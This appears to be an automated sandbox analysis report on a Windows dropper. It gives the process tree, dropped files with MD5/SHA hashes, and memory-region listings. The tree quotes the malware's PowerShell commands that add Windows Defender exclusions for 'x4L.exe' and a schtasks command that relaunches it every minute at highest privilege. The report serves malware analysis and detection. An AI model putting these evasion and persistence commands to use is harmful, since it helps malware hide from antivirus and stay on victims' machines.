C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\x4L.exe"C:\Windows\System32\x4L.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\x4Shellcode.exe"C:\Windows\System32\x4Shellcode.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DC0.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d9ab3936ebf6fed38eaf459295749389
SHA1158fa8f3970ceb35bcb9c5417e843ac6fe3ae706
SHA2564468439a325c4ef8c3aa846cc8cd401b36be35810068175369fe8f9cb1a9ca86
SHA5124bd2b0a6cb0a95ecd94985669d31bcebedaf294bcc2f1959190e46019a0625306e81de74e0cb8b32cb9a3ef75560cdef3051c0b9f1ff4e314e98d2f11378da1b
-
C:\Users\Admin\AppData\Local\Temp\tmp5DC0.tmp.batFilesize
160B
MD554a5b6dd7cd8041b45c013e12e6045eb
SHA10edb16a81447e4a79df066de38d26cd3051fac7b
SHA25608672d331bd761e3b97c2b8e01f99991f17b7d1aa15de7ad32c2d5cd9e62a669
SHA512b2fbc3d882bc73f0d4368a52c48c600c2bd2b368f9481e78c4735c9ee8be5bfa6fbd7e434815e9265ddbdcd62f2429b0ae1d984b47b91c3e246832be980dac2e
-
C:\Windows\System32\x4L.exeFilesize
68KB
MD59ecdf1a7818f7e9952b6041e3aa19b7a
SHA193a8357036356c1c1e20a5cf69fdbad877ce8a0f
SHA2560771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
SHA512847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853
-
C:\Windows\System32\x4Shellcode.exeFilesize
164KB
MD58a7bee2c8cec6ac50bc42fe03d3231e6
SHA1ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA51234370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5
-
C:\Windows\Temp\__PSScriptPolicyTest_xnuc24ja.ozb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/432-98-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/432-97-0x00000255A2510000-0x00000255A253C000-memory.dmpFilesize
176KB
-
memory/432-91-0x00000255A2510000-0x00000255A253C000-memory.dmpFilesize
176KB
-
memory/536-102-0x0000022A47330000-0x0000022A4735C000-memory.dmpFilesize
176KB
-
memory/636-64-0x000001AE3B8E0000-0x000001AE3B90C000-memory.dmpFilesize
176KB
-
memory/636-65-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/636-58-0x000001AE3B8E0000-0x000001AE3B90C000-memory.dmpFilesize
176KB
-
memory/636-56-0x000001AE3B8B0000-0x000001AE3B8D6000-memory.dmpFilesize
152KB
-
memory/636-57-0x000001AE3B8E0000-0x000001AE3B90C000-memory.dmpFilesize
176KB
-
memory/688-75-0x000002C58E8E0000-0x000002C58E90C000-memory.dmpFilesize
176KB
-
memory/688-76-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/688-69-0x000002C58E8E0000-0x000002C58E90C000-memory.dmpFilesize
176KB
-
memory/1000-87-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1000-86-0x0000023D334E0000-0x0000023D3350C000-memory.dmpFilesize
176KB
-
memory/1000-80-0x0000023D334E0000-0x0000023D3350C000-memory.dmpFilesize
176KB
-
memory/2796-18-0x0000000000190000-0x00000000001A8000-memory.dmpFilesize
96KB
-
memory/2796-904-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmpFilesize
10.8MB
-
memory/2796-903-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmpFilesize
10.8MB
-
memory/2796-17-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmpFilesize
10.8MB
-
memory/3608-35-0x00000215AF360000-0x00000215AF382000-memory.dmpFilesize
136KB
-
memory/3608-49-0x00000215AF390000-0x00000215AF4DF000-memory.dmpFilesize
1.3MB
-
memory/3608-39-0x00000215AF840000-0x00000215AF86A000-memory.dmpFilesize
168KB
-
memory/3608-41-0x00007FFA9CFB0000-0x00007FFA9D06D000-memory.dmpFilesize
756KB
-
memory/3608-40-0x00007FFA9E920000-0x00007FFA9EB29000-memory.dmpFilesize
2.0MB
-
memory/3692-45-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3692-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3692-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3692-44-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3692-53-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3692-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3692-51-0x00007FFA9E920000-0x00007FFA9EB29000-memory.dmpFilesize
2.0MB
-
memory/3692-52-0x00007FFA9CFB0000-0x00007FFA9D06D000-memory.dmpFilesize
756KB
-
memory/4472-0-0x00007FFA7D983000-0x00007FFA7D985000-memory.dmpFilesize
8KB
-
memory/4472-28-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmpFilesize
10.8MB
-
memory/4472-2-0x00007FFA7D980000-0x00007FFA7E442000-memory.dmpFilesize
10.8MB
-
memory/4472-1-0x0000000000140000-0x000000000017A000-memory.dmpFilesize
232KB